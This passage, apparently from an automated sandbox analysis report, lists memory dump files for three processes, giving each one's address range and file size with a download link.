                                        Download

                                      • memory/2676-61-0x0000000005FF0000-0x0000000006344000-memory.dmp

                                        Filesize

                                        3.3MB

                                        Download

                                      • memory/2676-38-0x0000000004FF0000-0x0000000005026000-memory.dmp

                                        Filesize

                                        216KB

                                        Download

                                      • memory/2676-39-0x00000000057B0000-0x0000000005DD8000-memory.dmp

                                        Filesize

                                        6.2MB

                                        Download

                                      • memory/2676-47-0x0000000005F10000-0x0000000005F76000-memory.dmp

                                        Filesize

                                        408KB

                                        Download

                                      • memory/2972-102-0x0000000005E90000-0x00000000061E4000-memory.dmp

                                        Filesize

                                        3.3MB

                                        Download

                                      • memory/2972-104-0x0000000006870000-0x00000000068BC000-memory.dmp

                                        Filesize

                                        304KB

                                        Download

                                      • memory/4092-169-0x0000000006C60000-0x0000000006CF6000-memory.dmp

                                        Filesize

                                        600KB

                                        Download

                                      • memory/4092-176-0x0000000006D80000-0x0000000006D9E000-memory.dmp

                                        Filesize

                                        120KB

                                        Download

                                      • memory/4092-175-0x0000000006DD0000-0x0000000006E46000-memory.dmp

                                        Filesize

                                        472KB

                                        Download

                                      • memory/4092-171-0x0000000007300000-0x00000000078A4000-memory.dmp

                                        Filesize

                                        5.6MB

                                        Download

                                      • memory/4092-170-0x0000000006010000-0x0000000006032000-memory.dmp

                                        Filesize

                                        136KB

                                        Download